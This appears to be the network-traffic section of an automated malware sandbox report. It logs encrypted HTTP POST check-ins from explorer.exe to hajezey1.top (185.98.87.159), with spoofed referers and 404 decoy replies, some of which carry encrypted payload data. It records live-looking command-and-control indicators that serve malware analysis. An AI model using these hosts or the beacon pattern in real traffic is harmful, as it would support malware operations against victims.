Oct 29, 2021 20:49:57.868648052 CEST	3210	IN	Data Raw: 32 f9 5d c3 bc 0e 98 cd b5 da 03 d7 db 02 0c a3 fc cc fd 5e 3c 7b 37 fa 85 59 15 57 3e 8e d7 ac 1f ab 97 e1 5f 61 9a 2a 30 44 f5 da 18 ef a7 33 5a 94 3a 9f 68 fa 88 6a d4 df 95 06 83 9f b6 77 19 2e 4a ed 82 22 a7 cd 97 2c 01 67 f7 ef fa d6 e3 ea Data Ascii: 2]^<{7YW>_a*0D3Z:hjw.J",g9,fw[urg:L.e/"sf^z\S ]/n]2/g^=3@`#W0V_RsC4CbTCmSLX1xjO>,v)_dG"j}!!
Oct 29, 2021 20:49:57.868684053 CEST	3211	IN	Data Raw: c2 da 2c b7 75 d3 98 eb c1 e4 51 83 6a 10 0c f9 12 b5 e1 35 87 6d fe 69 44 80 83 be a2 f1 5f 0e fd 10 e6 e1 9e 75 7f 13 48 72 c7 ec 98 19 f2 de 3c c8 98 bf 59 a6 d5 ad bb bc f6 62 de 42 a4 87 5e f5 64 e4 b8 52 f9 89 07 a3 8c 2b cc bd 32 fb 20 af Data Ascii: ,uQj5miD_uHr<YbB^dR+2 p2rf8#cUA:v)W6HW+Eu^Zt&oY{.`U]&^%7QY.9/G~($<!=zl5GH3,;?q5WV
Oct 29, 2021 20:49:57.868709087 CEST	3212	IN	Data Raw: b1 63 13 ab 07 6e 13 c5 cf a4 11 84 63 88 18 98 42 aa ba ee c5 7b a2 11 15 84 b9 b4 65 ba 0a ce 6e b7 b9 26 45 5f ce d5 dc 2a 3d aa 0f ee 1e b0 ba 00 47 4c 45 9a ae a6 79 e5 5b a1 c4 16 d9 4b 1f 6b e1 23 07 f5 07 5f cb d1 ba 71 bc 8f 7f 93 d9 f6 Data Ascii: cncB{en&E_=GLEy[Kk#_qlh[+$XU+FSw_7eSHw#RIwT^%7et9%Y,P,qip{ZC;qJVM=rO.!1o7{ f65ma??:V;\o'2\|iK2)WpK5
Oct 29, 2021 20:49:57.868732929 CEST	3214	IN	Data Raw: 4a 66 ed b2 d9 93 8b 68 a7 ad c2 52 e0 80 94 31 ff 87 34 0c a4 be 8f d4 a2 83 94 2f f6 88 84 e1 5f 12 34 a2 6f ae f6 79 62 01 c1 9e 17 44 43 58 aa 5a 9f 49 a7 71 2c 62 a1 ac c2 10 a1 53 6a cb 2b e0 0a 80 94 05 e6 c3 2c e8 72 1e 10 a4 a2 29 e1 27 Data Ascii: JfhR14/_4oybDCXZIq,bSj+,r)'FgW.IQ/Om.V@&Gz!q@!,9d]rgcOoFUDB#Ze\{27:aka:;`tU<\|pkvvCy$*[oG
Oct 29, 2021 20:49:57.868757963 CEST	3215	IN	Data Raw: 57 7a 2b ae 7a 08 39 26 d5 d3 9a fb f2 e3 af a8 3f 15 c2 82 16 cd 1f 6c 44 7c 62 f1 92 42 43 86 41 21 a4 bb 4e de e9 8e 35 24 24 5e 1d cd f1 16 d5 2d 50 db 21 4b c8 57 36 6e 02 52 15 35 a6 ed 41 30 3b 64 ec 36 0a e3 d8 19 95 27 ee 4d b7 3b 26 15 Data Ascii: Wz+z9&?lD\|bBCA!N5$$^-P!KW6nR5A0;d6'M;&rM*$E=BWv!_K-\|HTm/b+,GD2L)r#`0wIrmrudAjSn20006Sk;A?%6Rj+PA"Jc#]]xfm
Oct 29, 2021 20:49:57.868803978 CEST	3216	IN	Data Raw: ac 8b 0d 19 92 34 47 9a f0 64 4c 74 32 46 72 04 c2 73 81 c7 10 a4 2c 8e 12 91 f9 29 de c8 e4 76 42 18 48 0c 2b f7 2e 39 25 6d b4 3e 6d 51 7f ef 27 87 e9 d0 9c 47 ff 69 68 58 d0 85 b1 44 d4 84 85 63 b5 9a e6 0e bb 5e 98 7c 8d 72 25 b9 5b cc e4 9a Data Ascii: 4GdLt2Frs,)vBH+.9%m>mQ'GihXDc^\|r%[sW_S$GV~m(;R_9n}v\PRXkz<<hbj]CHXl3Lk*Dtkz{@tQotDoLQV~r"H^dQ`w@!
Oct 29, 2021 20:49:57.868843079 CEST	3218	IN	Data Raw: a8 33 4c 59 dd 3f 36 ff f8 ba a6 0d 08 ca b6 3f 30 c4 64 3e 60 84 c4 00 22 79 7c 5d 2a 25 45 b5 33 42 48 15 45 dd da 3b 85 8d a8 19 a2 54 2f cc de d4 f7 e9 35 83 34 bd d4 df 0f 15 b1 a0 33 93 f9 48 b6 62 94 fb f1 ed 21 29 09 09 19 dc a8 4d 84 8e Data Ascii: 3LY?6?0d>`"y\|]%E3BHE;T/543Hb!)MKxu}@ Uo58j[x"dl#;Xm:)`R"8Ui,ulolH?I~]Bm]v$rq]coi[v~/J:3ON^`zOuiQb
Oct 29, 2021 20:49:57.868911982 CEST	3219	IN	Data Raw: bb 22 46 3c c0 6e 3f a6 3c 09 bb 95 15 51 b3 ce b8 a8 18 d5 ee 92 e5 a7 8c 2d 25 2a f6 fc 2b ca ca eb dc 84 aa 38 f8 4b 4e d7 a7 09 88 a6 ac ed 67 e0 3a c3 c1 1b 76 55 24 b7 b7 1a 50 f2 2a 6c a2 3d 7d 4e 8b 42 5b 52 42 e7 7e a1 5b 4c fa bc ce 3f Data Ascii: "F<n?<Q-%+8KNg:vU$Pl=}NB[RB~[L?)5l}q2Z}$]YfU:#=fpGh>7s40dv34^W,Yw"JcDM)ehw#BTqS$p^4v* cM;$%~s-Aa]t
Oct 29, 2021 20:49:57.922431946 CEST	3221	IN	Data Raw: 34 a5 c5 6c 75 52 d8 bd 7c 23 b6 cd ea b9 7d 2c 96 8c e5 2b d6 9a 44 00 36 bf bf 27 a1 eb 29 95 ae 33 ea 4f ba 15 a8 42 21 72 e7 7f b2 80 87 e4 61 57 41 c9 f3 f0 22 20 f6 d5 90 ee 6d 03 97 12 3a 13 77 aa 33 3a 1a fc 92 5a 34 10 8c 90 3f ff 59 8a Data Ascii: 4luR\|#},+D6')3OB!raWA" m:w3:Z4?Yvo6!rm<G?O6~wgI"Vg^(+; LT7Y7lgmryO(^a@S}4@Rc7m&z0w.ckn`iuL?PR

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.4	49809	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:01.335403919 CEST	4946	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jkbenmco.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 166 Host: hajezey1.top
Oct 29, 2021 20:50:01.335416079 CEST	4946	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 84 de 94 66 5d 02 c9 a1 c1 64 3a 83 9c 22 Data Ascii: 6152Ek\lwmwu$f]d:"A[%bUqeRDcl7bkm*J}\+KZCtA07#MW GN,XE
Oct 29, 2021 20:50:01.417634964 CEST	4948	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:01 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.4	49812	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:01.501260042 CEST	4949	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jpjsnfgtc.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 308 Host: hajezey1.top
Oct 29, 2021 20:50:01.502015114 CEST	4949	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 95 66 5d 02 c8 a1 c1 64 3a 9f 8f 2f Data Ascii: 6152Ek\lwmwu$f]d:/j]_a-ET5"uw=xwOT$LV]1$OtK@ZR/!oIS'!7=7\|E).@jvUighopxK`LrqE{tM
Oct 29, 2021 20:50:01.585293055 CEST	4951	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:01 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.4	49814	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:01.938781977 CEST	4973	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jkmns.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 294 Host: hajezey1.top
Oct 29, 2021 20:50:01.938801050 CEST	4973	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 92 66 5d 02 c8 a1 c1 64 55 ce a5 68 Data Ascii: 6152Ek\lwmwu$f]dUh;Md[!gpR;1gqNAo:J%8OlU_C,>_f?.F1\{,a?bOz]_!Z'#OK^Jsc$~feRFO!Guvd%M:
Oct 29, 2021 20:50:02.021753073 CEST	4994	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:01 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 7f e2 46 aa 8f 8c f5 cf 9b 2b 25 9b f6 ba c9 1b b0 1c 67 74 d2 ff 95 87 cd 2b 80 78 51 a1 a2 8f 2c df d2 1c e0 32 02 50 08 08 d8 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 41 8f 20 59 55 11 5c 7c 3b 66 ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 bd 28 c6 8a 44 d8 06 0e 45 c7 1e 7d 6f fb e0 04 89 f9 d4 57 80 90 70 89 ec e4 4a 6b b6 f2 a2 22 48 52 df 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 23 36 55 96 da 19 d1 3a 2d b2 4e 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 71 87 4a 04 38 6d 72 14 2c d0 e8 b1 14 65 7c 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 a2 4c 64 cd 25 5c 8d b7 bf 2e 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 c5 d0 b8 be 34 56 9b 46 76 99 86 11 00 83 32 42 52 f7 c2 ae 64 0f 95 36 e1 48 52 67 25 50 b8 81 f6 bc 81 de bb 6e 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 bc a6 62 4a 08 5d f6 b3 06 2d 1a c0 5e f3 7c bb a7 fd d4 98 21 17 da 9a 2d 35 23 7d f5 b2 68 60 b8 10 31 fa ed ad 67 e1 e1 bd 84 f3 8c 40 b6 f0 90 4f a1 21 71 ae 61 2e 7a b1 76 af ce c6 83 41 66 30 ae a9 c8 d0 7e 33 3a 64 67 0b bf 77 6a 66 21 0e 8a ef 28 1d 41 81 d4 b6 78 8e 18 d3 e4 9e 0c 7b d6 6c 02 2f 27 76 d7 9b 4e 20 ba f5 be 08 85 fd 89 aa 41 b7 28 8f f4 d5 06 78 5c 9b b8 08 c0 e5 5c c5 17 00 f3 b8 d0 a3 39 a9 b2 13 20 1d 06 1a 1b e1 ea f0 6c 8d e9 c7 d2 83 6f d5 c5 3b ec cf 8b 40 75 02 99 e0 03 f4 c3 05 cb 99 d3 23 2a 71 c7 a5 d9 62 77 ca 08 8f bd c8 11 61 a1 99 9e 5f e3 0f 4e 8a d0 23 9d 43 8e 7e 14 0e b9 2c 58 99 f7 6d 08 d8 fd f7 cb ab 42 66 fb 05 6d 77 5e 8e b7 4a 84 99 fb 42 17 7d bd 91 94 13 85 f3 bd b3 3b 1c 67 c7 22 e7 19 8e 53 c0 b2 21 ab 63 95 22 89 ac 1f 13 34 5e 12 59 b3 52 34 eb e0 0f 25 b8 a3 c1 1d d7 cb ab 14 62 f3 3b 1f 70 da be 91 b3 bf de 2c eb 57 66 80 fe 9d 11 b0 5e fe 14 f9 20 e4 89 93 64 4b 70 94 ea 13 6b e6 e8 80 0b 3d f2 9d 65 09 de fb 18 e1 98 ea 30 e3 dc dd 6a db 82 96 dd 07 22 b9 ed 8c 54 a5 f1 36 81 ac cc b4 29 c7 79 f5 66 38 18 f8 e0 c0 24 b2 f0 9c 24 c8 92 7c f9 d4 e8 53 08 86 52 e4 3f a4 53 65 ad 06 70 00 16 b7 36 df 44 f1 22 74 2c e7 36 c5 da ac da 5f 81 50 ec 3e b9 72 39 0e ac 27 36 82 af 97 28 e0 f6 be e6 a7 e2 84 af 3a ce 39 e8 4e 95 91 3a 90 ff 53 64 22 62 a2 26 0c 11 bf 2a 5c a7 ef c6 a1 00 ae 8b 91 17 5d 35 bd ac c0 59 9d 9b f2 e5 fe de 54 1e 98 92 fb b2 6a 14 9d 84 32 c7 37 6f 03 70 51 8d c8 81 99 8b fa 81 7f 1d bc 6c c2 ca a5 a4 d0 9b 38 ea 81 2f 07 5b 6c 7e 96 23 97 84 79 ea 9a 4a 1d 68 8c 50 16 11 28 a0 81 bc 73 9d 7d bb fa c8 16 31 e5 a8 6f 20 c9 09 e4 ce cd 6b 90 46 97 fe da 39 9d f6 c1 6d 06 42 7b fb fa f3 a5 9a 46 e4 Data Ascii: 1f66S(SW\/iP"&&grq\|6?eIJ5~/ar"`g1Q5ih.Kw:i/+".]pW!RY8\|F+%gt+xQ,2P0YObyT=a'4A YU\\|;fIXKg[Ge92)g z6(DE}oWpJk"HRI?o\|6NI[LeU[0z;+W~5=PVpGZlqV@q!Uvy#6U:-N%GkKm@NQ>[qJ8mr,e\|"JG0Z"?kQTJMQLd%\.&Q#F<pvA>C/CbGB4VFv2BRd6HRg%Pnj6'NGc_,/DO9W%bJ]-^\|!-5#}h`1g@O!qa.zvAf0~3:dgwjf!(Ax{l/'vN A(x\\9 lo;@u#qbwa_N#C~,XmBfmw^JB};g"S!c"4^YR4%b;p,Wf^ dKpk=e0j"T6)yf8$$\|SR?Sep6D"t,6_P>r9'6(:9N:Sd"b&\]5YTj27opQl8/[l~#yJhP(s}1o kF9mB{F
Oct 29, 2021 20:50:02.021785021 CEST	4995	IN	Data Raw: bb 1e 5d 97 62 c2 0e db 31 d3 4c 46 0e e3 8e c1 68 bf 6c bc f0 ba ad 3d 6f c2 8f 88 03 48 70 a1 9c 82 7c 8e 4e 3c 55 84 05 88 f2 61 95 6d 57 31 db 31 4f df a7 36 03 d4 3b 08 f0 6b df cc be af 9a 5d 03 41 40 77 b4 15 50 54 0c d7 8b 38 7e 9b 71 55 Data Ascii: ]b1LFhl=oHp\|N<UamW11O6;k]A@wPT8~qU*x`9@3Q627Y6h)$O6:CoH\KW_g^eaE3W0D>m<5BQ>tU@5@N)&%T7E9;zmW8 T]r]#=)
Oct 29, 2021 20:50:02.021799088 CEST	4996	IN	Data Raw: 74 42 b2 90 0a d6 13 88 ba 8c 88 b5 eb fc 61 cc 77 8f 5c dd 56 65 c9 32 ad 44 12 7a 94 9c ae a7 6e a0 73 85 53 5a 6b 3e 22 e2 fa d7 b0 d6 50 af f5 70 21 9d 63 d1 dc 27 de 83 4e ee a5 94 84 75 d9 67 ea fc 60 87 6a ca bd a8 c1 13 ad 5c 83 c2 87 98 Data Ascii: tBaw\Ve2DznsSZk>"Pp!c'Nug`j\uuKL>LxwqAW/1D6qN0{l8{hZ8n#"}G('IRj_MXVT41zNYr)7:CnqS/%
Oct 29, 2021 20:50:02.021811962 CEST	4998	IN	Data Raw: a7 da ef 36 86 ad 10 0d 69 47 4b 81 15 be f5 8d 35 c0 1e 40 8f 85 52 4b 44 80 38 cc 88 a2 9c 3b d5 3b 4b 98 c5 ec 4a ce ed b0 a3 8f be 0d e2 ea 67 0b 06 60 4c bd 56 69 b6 42 ce 95 20 e3 db ea 62 80 d4 4f 8b 6b c3 5e df fd 7f 46 9b 63 94 8a 7f 4c Data Ascii: 6iGK5@RKD8;;KJg`LViB bOk^FcLR"$!IeW:;:F<pOS1)%U%^g{-XK@[l[3V2SFjW/ha!v #N<Igd,bz7cdO( bnUM
Oct 29, 2021 20:50:02.021828890 CEST	4999	IN	Data Raw: de 66 53 73 b4 6e 1c 51 74 2f d0 47 9d 77 4d 13 da f7 53 ee 2f 7b a2 dd 0a 48 75 78 94 87 0a 3c 0e b5 b9 29 3e 31 e0 d5 16 a9 d1 a2 fa 40 42 94 2e 8b 03 68 5e bf 2e d9 b4 e5 66 21 a9 16 d9 3e 9d b2 dd 07 9e 7e 03 7b 67 52 5a 0e 20 0c 87 ec c4 92 Data Ascii: fSsnQt/GwMS/{Hux<)>1@B.h^.f!>~{gRZ d+Uu`QM{?Qj.xl/bF2b QQ$P,fpHUuq?5]2o>-*k&$mT ?+a? y7Gf4w#=_Q{(vxfB&;t
Oct 29, 2021 20:50:02.021846056 CEST	5000	IN	Data Raw: 80 27 82 37 91 e3 2d 60 4f b6 2c 52 e0 09 c2 35 74 c1 ce fa e4 ce 2f a1 b6 00 5e 5f f4 4e a8 ed 5e f9 4c 29 67 27 f0 f2 22 05 66 d8 13 cf fd 06 f7 98 33 49 2c 8e 60 e9 4d 2f 19 3c 00 c3 52 8a 2b d3 23 09 d1 f9 6d 3c 59 e4 86 6b 18 29 4f fd 09 7f Data Ascii: '7-`O,R5t/^_N^L)g'"f3I,`M/<R+#m<Yk)Oxfg.QO[ZU!StFQ,!4S'va>S9gU;ShHglL6r tJIs+X7i*&mf:th"GmWkn[#`oxTNIc>
Oct 29, 2021 20:50:02.021961927 CEST	5002	IN	Data Raw: d5 7b 94 d2 c8 49 39 98 16 a1 db fb 54 cf 2c a5 6d cd 83 82 07 a7 1e e1 f3 80 32 7a ff 85 06 7a 77 53 e5 bb cc dc 19 71 a5 4c c5 3b 8f cd 78 23 73 f5 11 db d9 79 8f 57 c4 37 55 df fa c5 4e 13 33 cf c4 0c ae 9b 4b e3 3a 5c 65 77 b4 38 47 d3 5d 14 Data Ascii: {I9T,m2zzwSqL;x#syW7UN3K:\ew8G]Sgs=Rk_-YHH<YI4:q-M<Z]LbWgUgC'3nuzB?$@H8Yq}]jm?2000v`;+o %g647jkg%jR/d~f-
Oct 29, 2021 20:50:02.021981001 CEST	5003	IN	Data Raw: a8 06 8e e8 7f 36 fc 98 7b a6 c6 34 16 c6 1a 81 b3 8c 1e 38 23 52 d0 70 1d 15 33 d6 21 37 b1 61 71 d1 d2 b9 f7 0a 2b c6 ac d8 e5 c3 92 ae a1 5a 93 7a 39 2f 14 d2 16 94 97 a7 db 57 be c0 1e 8e 85 63 32 13 5b ca 34 a1 67 45 4d ae d8 46 ea c3 68 bc Data Ascii: 6{48#Rp3!7aq+Zz9/Wc2[4gEMFhsW-\%pH?ZzzmxnX_0Kz=`!<RWN,F.U+lYigy$h:{Sr)0lD+qAWHz/`8`Z:40dD
Oct 29, 2021 20:50:02.021996975 CEST	5005	IN	Data Raw: 6e ce b3 a6 37 32 dd 00 c0 3f 66 02 83 f0 4c c0 32 32 e1 ce c4 7b 3b 20 90 75 1a d6 68 f9 b8 4a fe 24 c1 13 c2 d5 51 be 2d 70 57 e6 5d 52 e8 49 4a 29 08 16 9c 83 34 bd e6 1e 0b 15 7d 23 be 63 16 b7 49 22 c9 7e 11 10 c9 d6 03 09 5a dc 23 c0 ce 73 Data Ascii: n72?fL22{; uhJ$Q-pW]RIJ)4}#cI"~Z#ss)xHu&A 4g${E?;2)73ftL} 8TFG(o:?+krA3C%JXFjH/J`b9rOTF571B
Oct 29, 2021 20:50:02.022015095 CEST	5006	IN	Data Raw: 31 f2 1c fb 35 91 63 26 81 b9 01 6a ea 51 72 c4 33 2d 48 28 11 6d e0 c7 fc d0 3d af 2a 01 a8 35 41 a6 fd db f4 0b 7c 10 a6 3a 54 09 88 6f a2 60 2e e0 3b f1 81 1b d5 65 64 b7 5d 2a 10 f2 ed 5c e2 3d 23 7f cb 42 04 63 02 e7 cf 90 1b 4c ef 8e 8e 3f Data Ascii: 15c&jQr3-H(m=5A\|:To`.;ed]\=#BcL?uQdb0]dQ?$'] \Jrbg09@L(pMoD}eAlW:oZk"A}y$`B->>ZroW,.ET$YxIu]] LSq
Oct 29, 2021 20:50:02.075880051 CEST	5008	IN	Data Raw: 4a af 3a 79 08 22 99 bd a1 07 b4 23 dd 8a bd ef 70 8c 1a 3e d7 ea 05 00 0f 40 aa f7 38 aa 29 57 0d 33 61 b0 db ea 9d 46 1d 33 e7 80 ba 54 f7 a5 42 dc b1 4c ef 85 39 df 11 75 48 af 5c fc 82 8a e2 52 77 21 a5 6c e5 c9 6f 98 75 10 aa 85 e7 8f e4 8a Data Ascii: J:y"#p>@8)W3aF3TBL9uH\Rw!louY}'%vlo?2/,ozG7_gJbASp>Up7n9f1Ok ^k#"@t()jNw#Fn0/}a;#*CP(^

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.4	49818	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:04.314554930 CEST	6308	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jwvrimo.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 205 Host: hajezey1.top
Oct 29, 2021 20:50:04.314567089 CEST	6308	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 84 de 92 66 5d 02 c9 a1 c1 64 19 c2 a5 17 Data Ascii: 6152Ek\lwmwu$f]d?q07zZaFF_cFG:t3US:HDU6iu>tFA2@lmZKyqV$v@=%df*)[(`
